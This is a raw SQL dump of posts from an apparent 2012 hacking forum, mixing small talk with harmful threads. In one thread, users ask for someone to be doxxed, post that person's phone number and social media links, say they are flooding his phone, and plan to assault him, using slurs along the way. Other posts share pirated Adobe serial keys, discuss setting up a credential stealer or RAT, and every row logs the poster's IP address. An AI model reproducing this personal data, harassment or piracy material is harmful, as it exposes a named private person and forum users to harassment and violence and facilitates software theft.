'f68ee42ba888e966ce172ce056bb9a64', '0', '0'); INSERT INTO mybb_posts VALUES('3194', '650', '3193', '61', 'RE: [LEAK] ShockwaveBooter (V4.2) [FREE]', '0', '61', 'NXK', '1349191780', 'Id never use this but nice contribution. I\'m starting to get sick of HF. community is filled with 7 yearolds', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '31bfb2b4a8cc3cc7acf2607c9b74a8bd', '0', '0'); INSERT INTO mybb_posts VALUES('3201', '650', '3193', '61', 'RE: [LEAK] ShockwaveBooter (V4.2) [FREE]', '0', '100', '??zg???g????61', '1349207839', 'You took the words right out of my mouth.', '66.30.110.193', '1109290689', '1', '0', '0', '0', '1', 'a967770c23ac86b288adf991d9357e09', '0', '0'); INSERT INTO mybb_posts VALUES('3202', '637', '3150', '16', 'RE: I need to SE a gaming keyboard', '0', '62', 'R?????zo?', '1349212399', '[quote=\'t3h jok3r\' pid=\'3150\' dateline=\'1349138540\']\r\nHonestly I never SE\'d Logitech. I know someone who can SE a gaming keyboard for you, I will ask them and let you know.\r\n[/quote]\r\n\r\nthanks I still need this, let me know if ou get someone.\r\nsince iTzIpod is busy lately.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '59b9f30e609087edf5e70622e4f03b9c', '0', '0'); INSERT INTO mybb_posts VALUES('3203', '637', '3098', '16', 'RE: I need to SE a gaming keyboard', '0', '82', 'iTzIpod', '1349218508', 'Terribly sorry though dude. :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '95141213592c4c5de1ead1a53f44fc70', '0', '0'); INSERT INTO mybb_posts VALUES('3204', '466', '2201', '13', 'RE: How to BruteForce a VPS!', '0', '214', 'Rave™', '1349220221', 'You stole my tutorial off of Ubers.', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '6e1d7e7017918a3ea1636e77517a58b2', '0', '0'); INSERT INTO mybb_posts VALUES('3205', '466', '3204', '13', 'RE: How to BruteForce a VPS!', '0', '61', 'NXK', '1349220795', '[quote=\'Kasual\' pid=\'3204\' dateline=\'1349220221\']\r\nYou stole my tutorial off of Ubers.\r\n[/quote]\r\n\r\nIll make sure he provides credits.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '0c9138de2a89b79cd6e5547110f3658a', '0', '0'); INSERT INTO mybb_posts VALUES('3206', '652', '0', '7', 'Being CyberBullied', '0', '82', 'iTzIpod', '1349221795', 'But anyways. This is the only piece of information on him that I got.\nI will update this thread later.\nI want someone to dox this skid. Really I don\'t like him. He was cyberbullying me saying shit he wouldn\'t say face to face. \n\nSays I look like a faggot with my ugly snappie (Snapback) and also how I am not funny and shit. Like bitch. Calling me ugly doesn\'t make you look like a super model or some shit. Like this skid is gonna get revenge.. And I need your help..\n\n\nI got his\n\n- Cell Number 647-808-0433\n- Twitter @HotFuckinMess\n- Facebook http://www.facebook.com/yourmomtapthat\n- Another Facebook http://www.facebook.com/christian.henriquez.3766', '24.212.197.164', '416597412', '1', '0', '82', '1349224440', '1', 'ed29ef2e33e7f66da19bad1b000585dd', '0', '1349224440'); INSERT INTO mybb_posts VALUES('3207', '652', '3206', '7', 'RE: Being CyberBullied', '0', '100', '??zg???g????61', '1349224651', 'This is going to be fun..\n[hr]\nI\'m bombing his phone now ;D', '65.96.215.138', '1096865674', '1', '0', '100', '1349224682', '1', '0c04e6a6a7eb215571cca9d70549e737', '0', '0'); INSERT INTO mybb_posts VALUES('3208', '652', '3206', '7', 'RE: Being CyberBullied', '0', '61', 'NXK', '1349225825', 'His twitter is hot fucking mess? Oh god this is going to be fun.\nspamming his phone also.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'df3a5ddc7ae919edcd4994a50b5271ce', '0', '0'); INSERT INTO mybb_posts VALUES('3209', '652', '3206', '7', 'RE: Being CyberBullied', '0', '82', 'iTzIpod', '1349228484', 'Well. He made a status about me.. Saying that I look like a faggot and my jokes aren\'t funny. Plus I don\'t remember talking to him or saying any jokes to him.. -.- He\'s just lurking on Facebook looking at my posts or something. Anyways. Will post a picture of his status some day. Probably tomorrow or so. Busy with a lot of stuff.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bb9699a5c919bbbb893737bc608d9455', '0', '0'); INSERT INTO mybb_posts VALUES('3210', '652', '3206', '7', 'RE: Being CyberBullied', '0', '1', 't3h jok3r', '1349231926', 'People say never mess with a gangster but the truth is that a gangster might quit and consider some things impossible to accomplish but for a hacker nothing is impossible. Hackers are decent people with just a bit twisted mind. They cool with everyone but when someone messes with them they won\'t give two fucks about them anymore.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '4aa6e95fa9336c898412bdb31056f95d', '0', '0'); INSERT INTO mybb_posts VALUES('3211', '253', '1106', '56', 'RE: Count to 200', '0', '1', 't3h jok3r', '1349231980', '28. I miss the 9 after the 8.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '131b02da1177f184a6727a0e1d25f6a9', '0', '0'); INSERT INTO mybb_posts VALUES('3212', '649', '3179', '3', 'RE: Thanks to the following and L33THacking Monthly Stats', '0', '1', 't3h jok3r', '1349232026', 'Lol Reborn and I am unique because are the heads and not everyone out here runs LH so that makes us unique :P', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f212f02168dea966c598f92574d3bc5c', '0', '0'); INSERT INTO mybb_posts VALUES('3213', '649', '3179', '3', 'RE: Thanks to the following and L33THacking Monthly Stats', '0', '3', '??????????¢™', '1349232034', 'Hey, You forgot to add me in it. Awwwww man.', '75.22.59.99', '1259748195', '1', '0', '1', '1349232757', '1', '2baca0f111326440cba93f46cd08a000', '0', '1349232757'); INSERT INTO mybb_posts VALUES('3214', '488', '2355', '8', 'RE: What are you listening to?', '0', '1', 't3h jok3r', '1349232199', 'I\'m listening to something no one can guess.\n\n[spoiler]\nI\'m listening to my mind and doing what it\'s telling me to do.\n[/spoiler]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f3c15e9de5d4e3ec57255b44649ca5c7', '0', '0'); INSERT INTO mybb_posts VALUES('3215', '190', '665', '56', 'RE: Copy and paste game', '0', '1', 't3h jok3r', '1349232327', 'http://mods.mybb.com/view/hide-links-to-guests-for-14', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'e7f11d0103941eecab546e2a221d7f03', '0', '0'); INSERT INTO mybb_posts VALUES('3216', '649', '3179', '3', 'RE: Thanks to the following and L33THacking Monthly Stats', '0', '82', 'iTzIpod', '1349232697', 'You made 38 posts in a couple days. That\'s good.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'df0810086603ab5f69a6e142cb2a93f0', '0', '0'); INSERT INTO mybb_posts VALUES('3217', '649', '3213', '3', 'RE: Thanks to the following and L33THacking Monthly Stats', '0', '1', 't3h jok3r', '1349232809', '[quote=\'??????????¢™\' pid=\'3213\' dateline=\'1349232034\']\r\nHey, You forgot to add me in it. Awwwww man.\r\n[/quote]\r\n\r\nLol that\'s because I thought you considered LH your own :(', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '078add4e2ab470a4c5af694eb73e7cc2', '0', '0'); INSERT INTO mybb_posts VALUES('3218', '649', '3217', '3', 'RE: Thanks to the following and L33THacking Monthly Stats', '0', '3', '??????????¢™', '1349232950', '[quote=\'t3h jok3r\' pid=\'3217\' dateline=\'1349232809\']\r\n[quote=\'??????????¢™\' pid=\'3213\' dateline=\'1349232034\']\r\nHey, You forgot to add me in it. Awwwww man.\r\n[/quote]\r\n\r\nLol that\'s because I thought you considered LH your own :(\r\n[/quote]\r\n\r\nI do man, I own LH. This is my forum. LOL', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', 'fe8a174b4dc8aa27a3099cab45a2dbf9', '0', '0'); INSERT INTO mybb_posts VALUES('3219', '466', '3204', '13', 'RE: How to BruteForce a VPS!', '0', '5', 'Timmy', '1349233348', '[quote=\'Kasual\' pid=\'3204\' dateline=\'1349220221\']\r\nYou stole my tutorial off of Ubers.\r\n[/quote]\r\n\r\nYou could have contacted me directly anyways i gave you credits.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f10a15a4f4db8eba9c486884f9197ffd', '0', '0'); INSERT INTO mybb_posts VALUES('3220', '190', '665', '56', 'RE: Copy and paste game', '0', '5', 'Timmy', '1349233964', 'http://community.mybb.com/thread-108595.html', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6c4ef3f0c55f0935dc97c4b0b9a8f41d', '0', '0'); INSERT INTO mybb_posts VALUES('3221', '649', '3218', '3', 'RE: Thanks to the following and L33THacking Monthly Stats', '0', '1', 't3h jok3r', '1349234104', '[quote=\'??????????¢™\' pid=\'3218\' dateline=\'1349232950\']\r\n[quote=\'t3h jok3r\' pid=\'3217\' dateline=\'1349232809\']\r\n[quote=\'??????????¢™\' pid=\'3213\' dateline=\'1349232034\']\r\nHey, You forgot to add me in it. Awwwww man.\r\n[/quote]\r\n\r\nLol that\'s because I thought you considered LH your own :(\r\n[/quote]\r\n\r\nI do man, I own LH. This is my forum. LOL\r\n[/quote]\r\n\r\nSo then you don\'t need to be appreciated for treating something yours and trying to keep something that belongs to you safe and healthy(active).', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7aff528100ac6bf698dbb51ca6837215', '0', '0'); INSERT INTO mybb_posts VALUES('3222', '653', '0', '43', 'Photoshop CS5 Serial Keys', '0', '1', 't3h jok3r', '1349234647', 'I have found some PS CS5 serials online so here they are.\r\n\r\n[code]\r\n1330-1270-2109-5153-8837-9231?\r\n1188-1702-9219-4234-2059-4581\r\n1330-1281-8916-6015-7348-5124\r\n1325-1558-5864-4422-1094-1126\r\n1325-0621-9125-0765-3648-0614\r\n1325-0365-5929-6118-8817-8422\r\n1325-0150-1163-7532-1626-3430\r\n1325-0178-1927-9019-0123-2254\r\n1325-0702-3693-1544-9166-3515\r\n1325-0549-2240-0071-3409-1342\r\n[/code]\r\n\r\nP.S: They might not work but there\'s nothing wrong in giving it a try.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b85bad05d76fdfd60868adfd398cefa8', '0', '0'); INSERT INTO mybb_posts VALUES('3223', '514', '2551', '9', 'RE: How to make serious money', '0', '8', 'spacefish36', '1349234808', 'Nice method. Thanks for sharing', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '5323ae61bf9d7facf0c0a51b49421d82', '0', '0'); INSERT INTO mybb_posts VALUES('3225', '546', '2745', '15', 'RE: OverTheRainbow\'s ProxyScanner v1.2', '0', '8', 'spacefish36', '1349234998', 'That\'s cool thanks for this.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'bbb3030000adce359d3a9620366fb9f1', '0', '0'); INSERT INTO mybb_posts VALUES('3226', '654', '0', '9', 'Make money typing captchas', '0', '8', 'spacefish36', '1349235229', 'Found a way to make money online typing captcha codes. The site is called MegaTypers and you can only register using an Affiliate Code which I will provide here.If you miss 5 within 15 minutes, you are banned for 48 hours.\r\n\r\nCode : 29B1\r\n\r\n[align=center][img]http://2.bp.blogspot.com/-JU5CKCYc3CY/Tye_xh5e4PI/AAAAAAAAAms/CX8vju7WbFA/s320/MEGATYPERS-CAPTCHA-WORK.jpg[/img]\r\n\r\n[url=http://www.megatypers.com/register][size=large]Register Here[/size][/url][/align]\r\n\r\nFound this from a blog called [url=http://bestmonetizingtechniques2012.blogspot.com/2012/04/make-money-typing-captchas.html]best monetizing techniques[/url].', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '17e815fb6cb4bd2fdd16bd54cc968408', '0', '0'); INSERT INTO mybb_posts VALUES('3227', '652', '3206', '7', 'RE: Being CyberBullied', '0', '61', 'NXK', '1349235386', 'Where do you live, If you\'re in ontario Ill just come to your school with my friends and beat this kid up. how about that..', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'c0fe837e1be0d3c52c667ddadb2e85c1', '0', '0'); INSERT INTO mybb_posts VALUES('3228', '652', '3227', '7', 'RE: Being CyberBullied', '0', '3', '??????????¢™', '1349235960', '[quote=\'NXK\' pid=\'3227\' dateline=\'1349235386\']\r\nWhere do you live, If you\'re in ontario Ill just come to your school with my friends and beat this kid up. how about that..\r\n[/quote]\r\n\r\nYou live in ontario? I live in san bernardino.', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '788fb3f2cfd00fb6f8047d0fe12af3c9', '0', '0'); INSERT INTO mybb_posts VALUES('3229', '652', '3228', '7', 'RE: Being CyberBullied', '0', '61', 'NXK', '1349236617', '[quote=\'??????????¢™\' pid=\'3228\' dateline=\'1349235960\']\r\n[quote=\'NXK\' pid=\'3227\' dateline=\'1349235386\']\r\nWhere do you live, If you\'re in ontario Ill just come to your school with my friends and beat this kid up. how about that..\r\n[/quote]\r\n\r\nYou live in ontario? I live in san bernardino.\r\n[/quote]\r\nOntario canada aha. Me and ipod are canadians eh?', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '47c42fa73529ac02310695b082a0e000', '0', '0'); INSERT INTO mybb_posts VALUES('3230', '652', '3229', '7', 'RE: Being CyberBullied', '0', '2', 'Apathy', '1349238233', '[quote=\'NXK\' pid=\'3229\' dateline=\'1349236617\']\r\n[quote=\'??????????¢™\' pid=\'3228\' dateline=\'1349235960\']\r\n[quote=\'NXK\' pid=\'3227\' dateline=\'1349235386\']\r\nWhere do you live, If you\'re in ontario Ill just come to your school with my friends and beat this kid up. how about that..\r\n[/quote]\r\n\r\nYou live in ontario? I live in san bernardino.\r\n[/quote]\r\nOntario canada aha. Me and ipod are canadians eh?\r\n[/quote]\r\nCanadian here as well. Where in Ontario? :o', '173.206.128.201', '-1378975543', '0', '0', '0', '0', '1', 'c514e24a752ab2f82b0ba59de6b28cbc', '0', '0'); INSERT INTO mybb_posts VALUES('3231', '488', '2355', '8', 'RE: What are you listening to?', '0', '2', 'Apathy', '1349238391', 'Nit anything ATM but probably \n\nHail the villain - Runaway soon. Sick song not my usual genre though. I like edm classic rock , rock , pop, rap etc... All types.', '173.206.128.201', '-1378975543', '0', '0', '0', '0', '1', '428d4821cf2ca9bdd0eb3bc2d3498e67', '0', '0'); INSERT INTO mybb_posts VALUES('3232', '190', '665', '56', 'RE: Copy and paste game', '0', '199', 'Anonymous™', '1349250266', 'Internal Server Error\n\nThe server encountered an internal error or misconfiguration and was unable to complete your request.\n\nPlease contact the server administrator, webmaster@l33thacking.net and inform them of the time the error occurred, and anything you might have done that may have caused the error.\n\nMore information about this error may be available in the server error log.\n\nAdditionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.', '85.230.50.38', '1441149478', '1', '0', '0', '0', '1', 'a2607a0d9ec108bd4ab35799eb8efc80', '0', '0'); INSERT INTO mybb_posts VALUES('3233', '637', '3203', '16', 'RE: I need to SE a gaming keyboard', '0', '62', 'R?????zo?', '1349252684', '[quote=\'iTzIpod\' pid=\'3203\' dateline=\'1349218508\']\r\nTerribly sorry though dude. :/\r\n[/quote]\r\n\r\nno worries bro :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '0e789dccd00b58d2ba6b1d6c01dd37a2', '0', '0'); INSERT INTO mybb_posts VALUES('3234', '654', '3226', '9', 'RE: Make money typing captchas', '0', '82', 'iTzIpod', '1349263755', 'Alrready posted this thread in the Monetizing Section.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '18957ae3fb171a9590b4bef062db50ae', '0', '0'); INSERT INTO mybb_posts VALUES('3235', '652', '3206', '7', 'RE: Being CyberBullied', '0', '82', 'iTzIpod', '1349263793', 'Brampton? :3 I doubt NXK lives here.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fba32714ed844b9f89d0b06ea2ce6281', '0', '0'); INSERT INTO mybb_posts VALUES('3236', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1349264157', 'Internal Server Error\n\nThe server encountered an internal error or misconfiguration and was unable to complete your request.\n\nPlease contact the server administrator, webmaster@l33thacking.net and inform them of the time the error occurred, and anything you might have done that may have caused the error.\n\nMore information about this error may be available in the server error log.\n\nAdditionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.\n\n\nLool Anonymous. We copied the same thing.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b131100b3d347ffbecbf90ad64cf87e1', '0', '0'); INSERT INTO mybb_posts VALUES('3237', '488', '2355', '8', 'RE: What are you listening to?', '0', '82', 'iTzIpod', '1349264202', 'Skrillex - Cinema :p\nMy playlist is the best ;)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1d201c6b6d99713d1c267bec071409ac', '0', '0'); INSERT INTO mybb_posts VALUES('3238', '514', '2551', '9', 'RE: How to make serious money', '0', '82', 'iTzIpod', '1349264265', 'You\'re welcome spacefish36.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0f8e4d29340c445e80ffda0b5a442103', '0', '0'); INSERT INTO mybb_posts VALUES('3239', '653', '3222', '43', 'RE: Photoshop CS5 Serial Keys', '0', '82', 'iTzIpod', '1349264295', 'Nice share t3h jok3r. Although I won\'t need it. Good luck to whoever is going to use the code.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '77eb04c602015cd47af161a2511871b8', '0', '0'); INSERT INTO mybb_posts VALUES('3240', '253', '1106', '56', 'RE: Count to 200', '0', '82', 'iTzIpod', '1349264337', '29 is the next number.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '33947e2f0cc7c5ff46e4c4b94b71cdc5', '0', '0'); INSERT INTO mybb_posts VALUES('3241', '652', '3206', '7', 'RE: Being CyberBullied', '0', '61', 'NXK', '1349265281', 'I live in the GTA, about 40 mins outside of brampton.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '83d3062261082d3a02cfb549e5c112fe', '0', '0'); INSERT INTO mybb_posts VALUES('3242', '253', '1106', '56', 'RE: Count to 200', '0', '62', 'R?????zo?', '1349265379', '30. keep them coming guys', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'cdbdbe7b6a7a30ad4e85d3daa6bb8d35', '0', '0'); INSERT INTO mybb_posts VALUES('3243', '652', '3235', '7', 'RE: Being CyberBullied', '0', '2', 'Apathy', '1349265639', '[quote=\'iTzIpod\' pid=\'3235\' dateline=\'1349263793\']\r\nBrampton? :3 I doubt NXK lives here.\r\n[/quote]\r\n\r\n:o I can like go visit you on the weekend.', '173.206.128.201', '-1378975543', '0', '0', '0', '0', '1', '03847075984beedc48e27a575714430e', '0', '0'); INSERT INTO mybb_posts VALUES('3244', '534', '2670', '23', 'RE: Manually Removing Viruses Through System Registry', '0', '205', 'mothered', '1349267904', 'Looking forward to viewing some more of your guides.\r\n\r\nCheers.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '0643fda30cadd05d1380a52303c708a7', '0', '0'); INSERT INTO mybb_posts VALUES('3245', '643', '3116', '7', 'RE: L33thakcers.com members here?', '0', '205', 'mothered', '1349268119', 'I\'m from L33thackers, and It went down around a couple of months ago.\r\n\r\nI like this forum better. It\'s more relaxing, and the members are quite friendly to get along with.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '934605ab40bc2e87a913154e1ed7bd60', '0', '0'); INSERT INTO mybb_posts VALUES('3246', '634', '3075', '7', 'RE: Depressed', '0', '205', 'mothered', '1349268291', 'Are you seeking any clinical treatment? \r\n\r\nIt can make all the difference. I do hope the clouds pass over, and the sun starts shinning for you once again.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '904f6d64cb8321dc2530bb02197a211f', '0', '0'); INSERT INTO mybb_posts VALUES('3247', '649', '3179', '3', 'RE: Thanks to the following and L33THacking Monthly Stats', '0', '205', 'mothered', '1349268524', 'That\'s awesome guys, let\'s keep the activity happening, and spread the word on this lovely forum.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '590cb076153f9b8d35c3bc25f900e519', '0', '0'); INSERT INTO mybb_posts VALUES('3248', '51', '133', '11', 'RE: DON\'T USE GOOGLE!!!', '0', '205', 'mothered', '1349268784', 'That\'s absolutely correct.\r\n\r\nGoogle\'s bots copy almost everything available on the net. They even copy sensitive Information, like usernames, passwords, and even credit card numbers. That\'s why searches via using Dorks, provide so many results.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'e382e7a3b2a94b6f2f5c2d1dc8262f09', '0', '0'); INSERT INTO mybb_posts VALUES('3249', '622', '3013', '42', 'RE: Founder of the Pirate Bay Gottfrid Svartholm Arrested in Cambodia', '0', '205', 'mothered', '1349269033', 'Isn\'t he the one who has since declared himself bankrupt?\r\n\r\nThe Pirate Bay has been down for a few days now (still Is at the time of this post). Google It and read the news. It\'s quite Interesting.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'b72bfa4e20ab9ffb4534bf4067200d0c', '0', '0'); INSERT INTO mybb_posts VALUES('3250', '652', '3206', '7', 'RE: Being CyberBullied', '0', '61', 'NXK', '1349273809', 'Coming to beat this kid up on the weekend don\'t worry ipod me and apathy got hm. ;)', '38.104.158.106', '644390506', '1', '0', '0', '0', '1', 'bca242ed53c48ed8f026790ecabdb226', '0', '0'); INSERT INTO mybb_posts VALUES('3251', '652', '3206', '7', 'RE: Being CyberBullied', '0', '100', '??zg???g????61', '1349284169', 'Lol so a recap- you all just gave out where you live on a public hacking forum ;D', '96.237.179.21', '1626190613', '1', '0', '0', '0', '1', 'e0cabc1c0c297424a290c88a9be67797', '0', '0'); INSERT INTO mybb_posts VALUES('3252', '51', '133', '11', 'RE: DON\'T USE GOOGLE!!!', '0', '100', '??zg???g????61', '1349284335', 'I have a picture about this ;D here- \r\n\r\n\r\n[img]http://i.imgur.com/lHshj.png[/img]', '96.237.179.21', '1626190613', '1', '0', '0', '0', '1', '3806dbfb66fdfee39ff42fc59e3359e3', '0', '0'); INSERT INTO mybb_posts VALUES('3253', '655', '0', '43', 'ANY CS5 AND SOME CS4 ADOBE SERIALS', '0', '100', '??zg???g????61', '1349284820', 'Hey everyone, I just wanted to offer a new service of mine. I\'ll give anyone that PM\'s me, any CS5 or CS4 serial keys for any adobe product. I don\'t have a serials for all CS4 products- so keep that in mind. Yep so PM me with the adobe product you want and I\'ll send you a serial ;D', '96.237.179.21', '1626190613', '1', '0', '100', '1349373898', '1', '6c1480c64d3345809e20342ce1e8174e', '0', '1349373898'); INSERT INTO mybb_posts VALUES('3335', '650', '3193', '61', 'RE: [LEAK] ShockwaveBooter (V4.2) [FREE]', '0', '100', '??zg???g????61', '1349373984', 'No problem ;D I <3 L33t Hacking', '66.30.110.193', '1109290689', '1', '0', '0', '0', '1', 'f73f39864083c397519d7d298335c0e3', '0', '0'); INSERT INTO mybb_posts VALUES('3254', '589', '2861', '15', 'RE: Crime24 Stealer', '0', '100', '??zg???g????61', '1349285261', 'Neon, you think you could set a server up for me? I\'ll give you the FTP info, if you could that would be amazing. I\'m on a mac so I can\'t do it myself.\n[hr]\nPM me if thats a yes ;DDDD', '96.237.179.21', '1626190613', '1', '0', '100', '1349285706', '1', 'ca8eb1ceb0f211e31cbe50b0253192cd', '0', '0'); INSERT INTO mybb_posts VALUES('3255', '190', '665', '56', 'RE: Copy and paste game', '0', '62', 'R?????zo?', '1349290620', 'Has anyone been on the phone to Green Day today? September has ended so should probably wake them up.\n\n\njust thought it was funny when I saw it from a friend on facebook, decided to share :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '143313939d2a3e2febff18807145a601', '0', '0'); INSERT INTO mybb_posts VALUES('3256', '253', '1106', '56', 'RE: Count to 200', '0', '82', 'iTzIpod', '1349292239', '31. Like an iPod.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2abbfa2d9aa1ca7cff5f6637b2fe3e7a', '0', '0'); INSERT INTO mybb_posts VALUES('3257', '652', '3206', '7', 'RE: Being CyberBullied', '0', '82', 'iTzIpod', '1349292488', 'Not really where I live.. Like that\'s my city. But not my house or anything.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '59f6f6150346d6143efdaae54e5b4d8e', '0', '0'); INSERT INTO mybb_posts VALUES('3258', '652', '3206', '7', 'RE: Being CyberBullied', '0', '61', 'NXK', '1349296563', '....? I said the GTA, which stands for greater toronto area.. Know one gave away anything. And like you said it\'s a publiic hacking forum.. it\'s not like we\'re a secret carding forum..', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'd340e3c60cb60b6bce6ce4256c9d47a6', '0', '0'); INSERT INTO mybb_posts VALUES('3259', '652', '3206', '7', 'RE: Being CyberBullied', '0', '100', '??zg???g????61', '1349297086', 'xD well if someone was looking for you, you just did them the giant favor of narrowing it down a LOT. True its not specific but whatever xD', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'a1a536c24019c2ba66981a1bda2cffe3', '0', '0'); INSERT INTO mybb_posts VALUES('3260', '652', '3206', '7', 'RE: Being CyberBullied', '0', '82', 'iTzIpod', '1349297819', 'Oh well. I wanna kick this guy\'s ass. He probably wants to suck my dick. So.. \nI don\'t care right now..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '87f70c33b63526068fc49d55beb91afa', '0', '0'); INSERT INTO mybb_posts VALUES('3261', '652', '3206', '7', 'RE: Being CyberBullied', '0', '2', 'Apathy', '1349299895', 'I did not specify anything whatsoever ever also I do not do illegal things so it would not matter. :3 Me and NHK got you iPod. Also by any chance are you Indian? Because Brampton?', '173.206.177.26', '-1378963174', '0', '0', '0', '0', '1', '9f66b286f3f12fec4951a8eb0345fd7d', '0', '0'); INSERT INTO mybb_posts VALUES('3262', '112', '283', '19', 'RE: ??? Ultimate Premium PPD Ebooks Give away ???', '0', '100', '??zg???g????61', '1349302694', 'Could I have this? Thanks bro', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '88b378c452cc4df5eef7090d007d7ef1', '0', '0'); INSERT INTO mybb_posts VALUES('3263', '652', '3259', '7', 'RE: Being CyberBullied', '0', '61', 'NXK', '1349303023', '[quote=\'iTzGRONgamer61\' pid=\'3259\' dateline=\'1349297086\']\r\nxD well if someone was looking for you, you just did them the giant favor of narrowing it down a LOT. True its not specific but whatever xD\r\n[/quote]\r\n\r\nEveryones IP\'s are logged on this site\r\n\r\nIt\'s public information. No one can hide.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '639eb2f7014fde407bb1b62216866dfb', '0', '0'); INSERT INTO mybb_posts VALUES('3264', '190', '665', '56', 'RE: Copy and paste game', '0', '61', 'NXK', '1349303344', 'MY LADY LUMPS\n\nmy friends name on steam I was adding him, I promise.', '99.253.94.204', '1677549260', '1', '0', '61', '1349303382', '1', 'ef37ca182d9e9ee9c40bda3270d3cfac', '0', '1349303382'); INSERT INTO mybb_posts VALUES('3265', '452', '2121', '29', 'RE: [EASY] ??How To Get $20+ Checks From Hershey\'s!??[eBook]', '0', '100', '??zg???g????61', '1349304215', 'They don\'t have a contact us form xD', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'a1d8119d1d77556306f66eedaaa1a391', '0', '0'); INSERT INTO mybb_posts VALUES('3266', '589', '3254', '15', 'RE: Crime24 Stealer', '0', '203', 'NeonLights', '1349304798', '[quote=\'iTzGRONgamer61\' pid=\'3254\' dateline=\'1349285261\']\r\nNeon, you think you could set a server up for me? I\'ll give you the FTP info, if you could that would be amazing. I\'m on a mac so I can\'t do it myself.\r\n[hr]\r\nPM me if thats a yes ;DDDD\r\n[/quote]\r\n\r\ndude im blackhat...\r\nof course i can set it up for you\r\nbut i suggest using a RAT instead of a stealer \r\nfor more options and fun ;)\r\nor just stick with a direct email/keylogger', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', 'd86871ad4e08ff0784c8d2839f33335b', '0', '0'); INSERT INTO mybb_posts VALUES('3267', '656', '0', '8', 'why do ppl like this shitty song!?!?', '0', '203', 'NeonLights', '1349304875', '[align=center][video=youtube]http://www.youtube.com/watch?v=7Dqgr0wNyPo[/video]\n\nTell me whats so good about it?\nAll I know is it ruins a good boner -.-[/align]', '67.68.75.193', '1128549313', '1', '0', '82', '1349305406', '1', '04ffb2633adbf388a587d419b0c54a20', '0', '1349305406'); INSERT INTO mybb_posts VALUES('3268', '657', '0', '19', '[Junk]why do ppl like this shitty song!?!?', '0', '203', 'NeonLights', '1349304913', '[align=center][video=youtube]http://www.youtube.com/watch?v=7Dqgr0wNyPo[/video]\r\n\r\ntell me whats so good about it?\r\nall i know is it ruins a good boner -.-[/align]', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', '04ffb2633adbf388a587d419b0c54a20', '0', '0'); INSERT INTO mybb_posts VALUES('3269', '657', '3268', '19', 'RE: why do ppl like this shitty song!?!?', '0', '82', 'iTzIpod', '1349305354', 'Junking this thread because it was posted twice\n[hr]\nThis thread has been junked.', '24.212.197.164', '416597412', '1', '0', '82', '1349305372', '1', 'b9f4f4fb53f75a794a70a682e7a9d9c7', '0', '0'); INSERT INTO mybb_posts VALUES('3270', '656', '3267', '8', 'RE: why do ppl like this shitty song!?!?', '0', '82', 'iTzIpod', '1349305417', 'I don\'t like this song either... :o', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '72afa647078e262dad73f56eb2047f26', '0', '0'); INSERT INTO mybb_posts VALUES('3271', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1349305454', 'http://external.ak.fbcdn.net/safe_image.php?d=AQAKdVdlN35tHq_Z&w=90&h=90&url=http%3A%2F%2Fplopu.com%2Fimg%2Fmin%2F2012%2F9%2F271.jpg\n\nI don\'t know.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'dd48c3223f9a13791b0928f25576a32a', '0', '0'); INSERT INTO mybb_posts VALUES('3272', '652', '3206', '7', 'RE: Being CyberBullied', '0', '82', 'iTzIpod', '1349305517', 'I\'m not Indian Apathy. I am Asian. (Vietnamese)', '24.212.197.164', 